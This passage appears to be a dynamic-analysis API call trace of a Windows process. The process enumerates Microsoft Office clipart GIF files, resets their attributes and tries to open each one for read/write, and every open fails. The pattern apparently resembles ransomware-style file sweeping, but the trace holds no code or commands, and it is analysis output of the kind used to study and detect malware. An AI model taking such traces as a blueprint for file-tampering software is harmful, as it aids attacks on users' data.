[0135.459] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.459] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.459] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.459] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\J0143745.GIF", dwFileAttributes=0x80) returned 0 [0135.459] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\J0143745.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\j0143745.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.460] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.460] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.460] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.460] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.460] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\J0143746.GIF", dwFileAttributes=0x80) returned 0 [0135.460] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\J0143746.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\j0143746.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.460] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.460] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.460] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.460] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.461] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\J0143748.GIF", dwFileAttributes=0x80) returned 0 [0135.461] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\J0143748.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\j0143748.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.461] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.461] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.461] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.461] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.462] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\J0143749.GIF", dwFileAttributes=0x80) returned 0 [0135.462] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\J0143749.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\j0143749.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.462] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.462] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.462] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.462] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.462] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\J0143750.GIF", dwFileAttributes=0x80) returned 0 [0135.462] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\J0143750.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\j0143750.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.462] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.462] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.462] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.462] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.463] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\J0143752.GIF", dwFileAttributes=0x80) returned 0 [0135.463] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\J0143752.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\j0143752.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.463] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.463] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.463] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.463] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.463] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\J0143753.GIF", dwFileAttributes=0x80) returned 0 [0135.463] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\J0143753.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\j0143753.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.463] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.463] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.464] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.464] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.464] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\J0143754.GIF", dwFileAttributes=0x80) returned 0 [0135.464] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\J0143754.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\j0143754.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.464] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.464] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.464] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.464] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.464] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\J0143758.GIF", dwFileAttributes=0x80) returned 0 [0135.464] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\J0143758.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\j0143758.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.465] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.465] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.465] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.465] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.465] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB00516L.GIF", dwFileAttributes=0x80) returned 0 [0135.465] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB00516L.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\wb00516l.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.465] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.465] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.465] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.465] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.465] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB00531L.GIF", dwFileAttributes=0x80) returned 0 [0135.466] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB00531L.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\wb00531l.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.466] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.466] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.466] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.466] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.466] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB00673L.GIF", dwFileAttributes=0x80) returned 0 [0135.466] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB00673L.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\wb00673l.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.466] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.466] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.466] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.466] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.467] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB00703L.GIF", dwFileAttributes=0x80) returned 0 [0135.467] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB00703L.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\wb00703l.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.467] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.467] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.467] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.467] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.467] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB00760L.GIF", dwFileAttributes=0x80) returned 0 [0135.467] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB00760L.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\wb00760l.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.467] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.467] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.467] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.468] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.468] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB00780L.GIF", dwFileAttributes=0x80) returned 0 [0135.468] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB00780L.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\wb00780l.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.468] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.468] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.468] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.468] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.468] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB01741L.GIF", dwFileAttributes=0x80) returned 0 [0135.468] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB01741L.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\wb01741l.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.468] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.469] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.469] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.469] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.469] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02039_.GIF", dwFileAttributes=0x80) returned 0 [0135.474] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02039_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\wb02039_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.474] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.474] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.474] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.474] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.475] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02055_.GIF", dwFileAttributes=0x80) returned 0 [0135.475] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02055_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\wb02055_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.475] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.475] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.475] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.476] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.476] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02073_.GIF", dwFileAttributes=0x80) returned 0 [0135.476] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02073_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\wb02073_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.476] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.476] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.476] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.476] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.476] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02074_.GIF", dwFileAttributes=0x80) returned 0 [0135.476] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02074_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\wb02074_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.477] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.477] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.477] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.477] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.477] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02077_.GIF", dwFileAttributes=0x80) returned 0 [0135.477] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02077_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\wb02077_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.477] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.477] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.477] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.477] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.477] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02082_.GIF", dwFileAttributes=0x80) returned 0 [0135.478] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02082_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\wb02082_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.478] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.478] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.478] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.478] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.478] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02085_.GIF", dwFileAttributes=0x80) returned 0 [0135.478] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02085_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\wb02085_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.478] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.478] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.478] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.478] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.479] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02097_.GIF", dwFileAttributes=0x80) returned 0 [0135.479] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02097_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\wb02097_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.479] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.479] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.479] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.479] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.479] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02106_.GIF", dwFileAttributes=0x80) returned 0 [0135.479] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02106_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\wb02106_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.479] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.479] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.480] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.480] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.480] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02116_.GIF", dwFileAttributes=0x80) returned 0 [0135.481] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02116_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\wb02116_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.481] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.481] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.481] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.481] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.481] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02134_.GIF", dwFileAttributes=0x80) returned 0 [0135.481] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02134_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\wb02134_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.481] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.481] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.481] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.481] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.482] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02187_.GIF", dwFileAttributes=0x80) returned 0 [0135.482] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02187_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\wb02187_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.482] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.482] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.482] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.482] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.482] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02198_.GIF", dwFileAttributes=0x80) returned 0 [0135.482] CreateFileW 